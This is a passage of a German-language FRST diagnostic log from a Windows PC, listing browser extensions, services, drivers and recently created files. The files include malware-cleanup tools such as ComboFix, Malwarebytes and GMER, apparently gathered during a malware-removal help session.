C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1 Internet Explorer: ================== HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> D:\Wuala\microsoft office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation) Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Handler-x32: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - D:\Wuala\microsoft office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation) Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies) Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation) Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation) Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation) Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation) FireFox: ======== FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] () FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.) FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08] FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22] FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com Chrome: ======= CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/" CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16] CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16] CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16] CHR Extension: (Gmail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1 CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15] CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2 CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03] CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03] CHR Extension: (Google-Suche) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03] CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27] CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03] CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18] CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03] CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03] CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url> ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L) R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd) S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation) S3 Microsoft Office Groove Audit Service; D:\Wuala\microsoft office\Office12\GrooveAuditService.exe [65824 2006-10-27] (Microsoft Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation) R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] () S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation) R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] () S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X] S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X] ===================== Treiber (Nicht auf der Ausnahmeliste) ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.) R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.) R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.) R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.) R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.) R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.) R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.) R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.) R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.) R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation) R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd) S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation) S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation) R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] () R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation) R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc) R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc) R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc) S3 catchme; \??\C:\ComboFix\catchme.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2015-09-28 23:12 - 2015-09-28 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2015-09-28 23:09 - 2015-09-28 23:09 - 00000000 ____D C:\Program Files (x86)\Microsoft Works 2015-09-28 23:09 - 2015-09-28 23:09 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 2015-09-28 23:06 - 2015-09-28 23:06 - 00000000 ____D C:\Program Files\Microsoft Office 2015-09-28 23:06 - 2015-09-28 23:06 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8 2015-09-28 18:12 - 2015-09-28 18:12 - 02870984 _____ (ESET) C:\Users\Kenny G\Downloads\esetsmartinstaller_deu.exe 2015-09-27 20:55 - 2014-05-14 18:23 - 02477536 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00700384 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00058336 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe 2015-09-27 20:55 - 2014-05-14 18:23 - 00044512 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00038880 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll 2015-09-27 20:55 - 2014-05-14 18:21 - 02620928 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll 2015-09-27 20:55 - 2014-05-14 18:20 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll 2015-09-27 20:55 - 2014-05-14 18:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll 2015-09-27 20:54 - 2014-05-14 09:23 - 00198600 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll 2015-09-27 20:54 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll 2015-09-27 20:54 - 2014-05-14 09:20 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe 2015-09-27 20:54 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe 2015-09-23 13:01 - 2015-09-23 13:01 - 00001143 _____ C:\Users\Kenny G\Desktop\Fixlist.txt 2015-09-23 06:35 - 2015-09-23 06:35 - 00000000 ____D C:\Windows\system32\SPReview 2015-09-23 05:40 - 2015-09-29 09:44 - 00001210 _____ C:\Windows\setupact.log 2015-09-23 05:40 - 2015-09-29 09:22 - 00464032 _____ C:\Windows\system32\FNTCACHE.DAT 2015-09-23 05:40 - 2015-09-29 09:22 - 00006624 _____ C:\Windows\PFRO.log 2015-09-23 05:40 - 2015-09-23 05:40 - 00000000 _____ C:\Windows\setuperr.log 2015-09-23 05:31 - 2015-09-23 05:31 - 00001589 _____ C:\Users\Kenny G\Desktop\mabam neu.txt 2015-09-23 05:28 - 2015-09-23 07:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2015-09-23 04:59 - 2015-09-23 04:59 - 00000000 ____D C:\Users\Kenny G\Downloads\FRST-OlderVersion 2015-09-23 04:58 - 2015-09-28 23:14 - 00120216 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT 2015-09-22 06:36 - 2015-09-22 06:36 - 00001583 _____ C:\Users\Kenny G\Desktop\neu.txt 2015-09-21 18:38 - 2015-09-21 18:38 - 00028509 _____ C:\ComboFix.txt 2015-09-21 18:13 - 2011-06-26 08:45 - 00256000 _____ C:\Windows\PEV.exe 2015-09-21 18:13 - 2010-11-07 19:20 - 00208896 _____ C:\Windows\MBR.exe 2015-09-21 18:13 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00098816 _____ C:\Windows\sed.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00080412 _____ C:\Windows\grep.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00068096 _____ C:\Windows\zip.exe 2015-09-21 18:12 - 2015-09-21 18:38 - 00000000 ____D C:\Qoobox 2015-09-21 18:12 - 2015-09-21 18:36 - 00000000 ____D C:\Windows\erdnt 2015-09-21 18:10 - 2015-09-21 18:10 - 05635484 ____R (Swearware) C:\Users\Kenny G\Downloads\ComboFix.exe 2015-09-20 19:56 - 2015-09-20 19:56 - 00000000 _____ C:\Users\Kenny G\Desktop\Neues Textdokument.txt 2015-09-20 19:46 - 2015-09-20 19:46 - 00040674 _____ C:\Users\Kenny G\Desktop\AVG log.csv 2015-09-20 19:42 - 2015-09-20 19:35 - 00058541 _____ C:\Users\Kenny G\Desktop\FRST.txt 2015-09-20 19:42 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Desktop\Addition.txt 2015-09-20 19:42 - 2015-09-20 18:20 - 00054932 _____ C:\Users\Kenny G\Desktop\mbam-log-2015-09-20 (17-46-10).xml 2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt 2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe 2015-09-20 19:17 - 2015-09-23 05:01 - 00040133 _____ C:\Users\Kenny G\Downloads\Addition.txt 2015-09-20 19:16 - 2015-09-29 09:48 - 00019716 _____ C:\Users\Kenny G\Downloads\FRST.txt 2015-09-20 19:15 - 2015-09-29 09:47 - 00000000 ____D C:\FRST 2015-09-20 19:14 - 2015-09-23 04:59 - 02192384 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe 2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log 2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable 2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe 2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte 2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt 2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe 2015-09-20 17:43 - 2015-09-23 04:58 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe 2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe 2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe 2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT 2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders 2015-09-19 16:13 - 2010-11-05 03:57 - 01942856 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll 2015-09-19 16:13 - 2010-11-05 03:57 - 00048976 _____ (Microsoft Corporation) C:\Windows\system32\netfxperf.dll 2015-09-19 16:12 - 2010-11-20 15:33 - 01924480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys 2015-09-19 16:12 - 2010-11-20 15:33 - 01659776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys 2015-09-19 16:12 - 2010-11-20 15:33 - 00299392 _____ (Microsoft Corporation) C:\Windows\system32\mcupdate_GenuineIntel.dll 2015-09-19 16:12 - 2010-11-20 15:33 - 00273792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys 2015-09-19 16:12 - 2010-11-20 15:28 - 01731936 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 14633472 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 14174208 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 08988160 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 03860992 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbon.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 03715584 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 03650560 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 03027968 _____ (Microsoft Corporation) C:\Windows\system32\WMVCORE.DLL 2015-09-19 16:12 - 2010-11-20 15:27 - 03008000 _____ (Microsoft Corporation) C:\Windows\system32\xpsservices.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 02314752 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 02223616 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 02086912 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 02018304 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01888256 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL 2015-09-19 16:12 - 2010-11-20 15:27 - 01881088 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01753088 _____ (Microsoft Corporation) C:\Windows\system32\vssapi.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01743360 _____ (Microsoft Corporation) C:\Windows\system32\sysmain.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01646080 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01556992 _____ (Microsoft Corporation) C:\Windows\system32\RacEngn.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01490944 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01326080 _____ (Microsoft Corporation) C:\Windows\system32\NaturalLanguage6.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01219584 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01197056 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01188864 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01110016 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 01109504 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 00960512 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 00488448 _____ (Microsoft Corporation) C:\Windows\system32\secproc.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 00485888 _____ (Microsoft Corporation) C:\Windows\system32\secproc_isv.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 00263168 _____ (Microsoft Corporation) C:\Windows\system32\spwizui.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 00133632 _____ (Microsoft Corporation) 